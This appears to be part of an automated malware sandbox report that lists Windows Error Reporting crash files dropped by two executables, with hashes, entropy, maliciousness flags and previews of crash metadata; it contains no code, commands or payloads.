SSDEEP:	96:KntgCsSihqyoA7JfdQXIDcQnc6rCcEhcw3rL+HbHg/wWGTf3hOycoqzIPtZrXOnC:WgCH/f056rAjsAZrZ4zuiFJZ24IO8LP
MD5:	6A80844BF7221481F63BD3A2E00CFC7F
SHA1:	F65F33EFDF272DC9E888CE3423E14FB11F36BF19
SHA-256:	93871DC68CBE72F3DB6DED6FCFA0AB8BDF7F30131878AF54DACD9AA4245D91A9
SHA-512:	5E1614676E8080CEFEDFBE37AF07D7A74E7A6FD8C2E376492F8151BDE99C23A6FD3D4D9581303E2EC0A20ADA89054DA7EF87E50F28521EC67F54842549AE157E
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.2.5.0.1.5.7.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.8.c.4.6.1.7.-.4.4.5.5.-.4.a.e.8.-.a.e.c.7.-.7.c.d.d.8.1.2.8.e.5.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.6.3.9.3.0.7.-.1.9.8.4.-.4.7.8.0.-.9.b.5.f.-.b.1.1.c.8.5.d.c.0.f.0.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_d5af914b-f0d5-400a-add1-d467f9d95a4c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9516463781898461
Encrypted:	false
SSDEEP:	192:bOgPH/f056rAjsAZrZ4zuiFJZ24IO8LP:bOgPH/M56rAjSzuiFJY4IO8LP
MD5:	1515DDC9AA89F32E82FB12141C414D5F
SHA1:	0FEB6F829616651F04507766EDF1B488DB1FCF7C
SHA-256:	9496E089A7C9D0BE5BCF9CBB608D7EC69739A21CB1B7D9DAEBC15795AA4BE192
SHA-512:	CCA0839876130CCB6B17D6FEFC653718CF2C6908304AD1CEEF3EED18D3FC6B006E329C4D86B1C4374D9027412D307AF7CEC7284406AD2C5967A602E0E5EBF65E
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.3.8.7.6.9.3.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.a.f.9.1.4.b.-.f.0.d.5.-.4.0.0.a.-.a.d.d.1.-.d.4.6.7.f.9.d.9.5.a.4.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.e.4.b.d.0.0.-.6.3.c.e.-.4.5.3.0.-.a.4.6.0.-.6.e.a.1.d.7.4.5.d.4.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_dc002a0b-5e80-42c9-a1b3-80acf08ce12b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9516911057156149
Encrypted:	false
SSDEEP:	96:bJJgqsSihqyoA7JfdQXIDcQnc6rCcEhcw3rL+HbHg/wWGTf3hOycoqzIPtZrXOnC:DgqH/f056rAjsAZrZ4zuiFJZ24IO8LP
MD5:	4D2ED1CF98991443BAC6796ED0986D72
SHA1:	F7D6AFB2E5D3C5C4B72BFD71F2ADC1ABC0823FF1
SHA-256:	21977F37CD9D12C52E401AF004AA9AFACC1E69C14C72EA1B22765A720A121DAE
SHA-512:	45725259EAE4C9C12A71F3A7FF997E0F2E3FB9510F69F07E23433FE81F06B978B4315044695B1D2C0C2DF3005E3E5EC11050A9D6E8C6D99F1235F7E4CFF340CF
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.3.2.1.1.4.4.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.0.0.2.a.0.b.-.5.e.8.0.-.4.2.c.9.-.a.1.b.3.-.8.0.a.c.f.0.8.c.e.1.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.e.0.9.9.f.9.-.1.4.6.6.-.4.a.0.2.-.8.d.5.5.-.2.2.2.5.c.8.e.7.e.f.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_ef1bc2af-dd77-424f-a7f9-fbd01a47a934\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9383588787794396
Encrypted:	false
SSDEEP:	96:qog2sSihqyoA7JfdQXIDcQnc6rCcEhcw3rL+HbHg/wWGTf3hOycoqzIPtZrXOnmS:Pg2H/f056rAjsAZrZxzuiFJZ24IO8LP
MD5:	FEA3C847567A72A059BC6647D1738273
SHA1:	D062964D289D7C1C40E2718A344F436FDE1B57E7
SHA-256:	80711C84A7FA56D418C2F5A3817C315EB575B2F780F5DA5CEB24BC64F204F512
SHA-512:	E02F7E27BE5C117C97EE872288176C07D7AA184C4394B8F291D33C4793251D1192689CBDA8D59EAB07A718EE076AEB7BF4CD5B705FBEF726E059CFDBDE45063B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.1.4.5.5.9.5.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.1.b.c.2.a.f.-.d.d.7.7.-.4.2.4.f.-.a.7.f.9.-.f.b.d.0.1.a.4.7.a.9.3.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.f.d.0.b.d.2.-.b.3.9.9.-.4.1.7.6.-.a.c.6.9.-.b.0.8.6.c.c.f.b.7.8.8.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_432e3f29626986254a7b6283d16c16c05d366d53_96c31456_f7984f38-4423-4199-a7de-2d3e6225de72\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9516973440826928
Encrypted:	false
SSDEEP:	96:CojygvsSihqyoA7JfdQXIDcQnc6rCcEhcw3rL+HbHg/wWGTf3hOycoqzIPtZrXOC:2gvH/f056rAjsAZrZ4zuiFJZ24IO8LP
MD5:	A6E5EBA63021B3A2F8FF89858788ED66
SHA1:	0BDDE343EAC4B38AC56D342B098065EAF83E2690
SHA-256:	5D881E72E5D6517E7DD0FADFD1F0351ACF924D366B5F5BC60276BDE6E6E5EECA
SHA-512:	8206D76CBAD6F41AB88432870420EF3A7D71E5707B8E9CAAF65465C156638605B5F88501FE2E7D5EB333A7F35FCFCDC6B18C2B7C32EC00C06B1205AEE1A94802
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.4.8.5.5.3.3.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.9.8.4.f.3.8.-.4.4.2.3.-.4.1.9.9.-.a.7.d.e.-.2.d.3.e.6.2.2.5.d.e.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.3.d.2.8.5.b.-.c.a.2.7.-.4.8.f.3.-.b.9.0.2.-.3.6.9.5.b.1.0.e.b.d.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltlbVjClX9.exe_ad55bb62617fbf3ce26508ff396b3caaf107e4d_96c31456_73c0624d-346f-45a4-bab4-134cc0bb6d95\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0316575667389611
Encrypted:	false
SSDEEP:	192:c368gWH/I0kigMqjsAZrZBRdzuiFJZ24IO8LP:D8gWH/jkigvjnzuiFJY4IO8LP
MD5:	F624937F233D5D229578F097695500A5
SHA1:	1628E8986E4DC58C65E5FB00C7F19B19F8EC76DF
SHA-256:	1E4D1288542BED5C220C493F7A88D6B76D64129B72CF594D1D0404F82FE9DF97
SHA-512:	C224F9FA134EB24FD26542F06450CC63B5585AD73AD1A512970A2605E2145757EE002167C8882E26314D8B29FA91DEE90D7AE01356645CB24142B403DC05FC2F
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.6.4.8.3.6.6.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.7.0.7.3.1.4.7.0.7.7.4.1.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.c.0.6.2.4.d.-.3.4.6.f.-.4.5.a.4.-.b.a.b.4.-.1.3.4.c.c.0.b.b.6.d.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.2.0.c.a.b.3.-.5.2.7.8.-.4.6.a.3.-.9.6.7.9.-.d.9.6.a.d.e.6.c.8.8.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.t.l.b.V.j.C.l.X.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.4.0.-.0.0.0.1.-.0.0.1.4.-.8.d.4.2.-.9.3.6.9.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.8.d.0.b.d.9.b.3.8.0.0.7.3.1.b.8.7.b.4.8.d.b.a.2.8.6.0.d.e.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.l.t.l.b.V.j.C.l.X.9...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_55c4e94cc5aa70eec748805ec5ba323268eb7fb8_4acc4190_04fc6a8a-d689-4438-b53c-dc60edc5f592\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9192040205447092
Encrypted:	false
SSDEEP:	96:DhpM+s1hqyoA7JfdQXIDcQnc6rCcEhcw3rb+HbHg/wWGTf3hOycoqzIPtZrXOnmX:FS+bf056rQjsAZr3uzuiFJZ24IO8NU
MD5:	446B220B0B0CD943845F41722BB4E094
SHA1:	063FDAA97FE4858D711C319AE98EB0420EC50A1B
SHA-256:	6A1E975C78F273FD0261E2124BD568C02D5D08E6625C2D1C4AB9C25869A29EE8
SHA-512:	A73134C3AA39F279D4E888F3AA3D426FBBBFCA769A87D99C875609632C6E8F4109C37ADFA6113A6F312B40169F293DB357AE4AD71A8208D6E0F02A88233F38F9
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.3.5.1.5.8.6.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.f.c.6.a.8.a.-.d.6.8.9.-.4.4.3.8.-.b.5.3.c.-.d.c.6.0.e.d.c.5.f.5.9.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.7.7.9.d.7.5.-.9.3.9.7.-.4.8.2.1.-.9.7.a.b.-.c.d.2.9.f.6.e.2.5.0.5.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_55c4e94cc5aa70eec748805ec5ba323268eb7fb8_4acc4190_712235f5-d33d-41f8-a427-5e8a326fb017\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9191762597168166
Encrypted:	false
SSDEEP:	96:2kpqMls1hqyoA7JfdQXIDcQnc6rCcEhcw3rb+HbHg/wWGTf3hOycoqzIPtZrXOnr:LBlbf056rQjsAZr3uzuiFJZ24IO8N
MD5:	99C0B4011511A3FA5E1F31E5E6F8C7C9
SHA1:	6B8D60262FEDF421DA0B841EB3822F730573AF23
SHA-256:	D917970C94E52CC64CADC45981AC1C8B994CC483BE0DB457F899EC64F6ED5F8E
SHA-512:	50DB5E83BF70F8831C0A18DF2249265F0411B0AC95F1D1789D48FD8A8A49A204F0B5665FE05C356BBF2C9C611A50EE1429D63C09B3AD379FDC81D0DE78FEBD29
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.6.0.3.7.9.0.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.1.2.2.3.5.f.5.-.d.3.3.d.-.4.1.f.8.-.a.4.2.7.-.5.e.8.a.3.2.6.f.b.0.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.6.5.6.1.e.1.-.4.9.6.1.-.4.4.b.c.-.9.7.7.6.-.b.e.d.3.d.1.b.9.8.e.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_55c4e94cc5aa70eec748805ec5ba323268eb7fb8_4acc4190_82db1b60-7ed6-439d-bba3-9e9f00a5fc05\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8982130497161618
Encrypted:	false
SSDEEP:	96:31hMes1hqyoA7JfdQXIDcQnc6rCcEhcw3rb+HbHg/wWGTf3hOycoqzIPtZrXOnm3:Qebf056rQjsAZr3CzuiFJZ24IO8N
MD5:	F64233CE18074583D89372C5A32C0423
SHA1:	45997B360FB1C5BE8D7CB38EBE970812EE0249EC
SHA-256:	CE633ADAD0368411E9FE7699311016AC4BE09B4F5F234DC909C20C07ADBEA809
SHA-512:	07027BE55AF7F7553C3974AD1971790A2828DF3100DF04276E7822831659A798CE11E71CA42097EDA374CA3F6CB57CCD4291C75A606131543F1BC73ABF9E1F28
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.1.0.3.0.4.0.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.d.b.1.b.6.0.-.7.e.d.6.-.4.3.9.d.-.b.b.a.3.-.9.e.9.f.0.0.a.5.f.c.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.e.6.e.6.3.7.-.9.2.3.f.-.4.3.8.0.-.9.0.d.7.-.2.0.4.4.3.1.9.7.d.9.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_55c4e94cc5aa70eec748805ec5ba323268eb7fb8_4acc4190_c3665da2-8f3e-4324-9707-7b4a7d5a7462\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	0.9189971176192222
Encrypted:	false
SSDEEP:	96:3veOwMFLs1hqyoA7JfdQXIDcQnc6rCcEhcw3rb+HbHg/wWGTf3hOycoqzIPtZrXg:2cFLbf056rQjsAZr3uzuiFJZ24IO8N
MD5:	095996149F4DD62E2E9E3B50B3497EBA
SHA1:	F14579B2E2875E68B33A1CC93A0FE26AF465DB14
SHA-256:	90491D9B6B85B898023079C6AED8C5BF28C62ECB4E701D07417E840D86483BE7
SHA-512:	D4EE69F6A32B4901701A0846F0F0EE213817506F353A5BD6F6938C7A62BB2464BEE14C9F5ECABAAFF8F15A28BEF271D8D53C78768891DBCC04A0D992D218C993
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.0.7.3.1.6.8.9.7.1.5.2.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.6.6.5.d.a.2.-.8.f.3.e.-.4.3.2.4.-.9.7.0.7.-.7.b.4.a.7.d.5.a.7.4.6.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.a.a.3.d.e.6.-.2.4.a.8.-.4.f.3.f.-.b.2.0.1.-.f.8.f.8.d.5.f.0.8.f.0.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.2.c.-.0.0.0.1.-.0.0.1.4.-.a.e.2.6.-.9.1.7.1.d.2.e.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.4.a.6.e.f.7.2.6.3.0.2.6.d.7.4.c.7.a.b.5.4.6.3.7.c.d.4.b.3.3.6.0.2.8.1.4.3.b.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6././.2.9.:.0.8.:.1.7.:.2.5.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_55c4e94cc5aa70eec748805ec5ba323268eb7fb8_4acc4190_ee3190e6-233a-4869-8382-d626f6e8db53\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8918046462492785
Encrypted:	false
SSDEEP:	96:R+FM7s1hqyoA7JfdQXIDcQnc6rCcEhcw3rb+HbHg/wWGTf3hOycoqzIPtZrXOnm6:R7bf056rQjsAZr3OzuiFJZ24IO8N
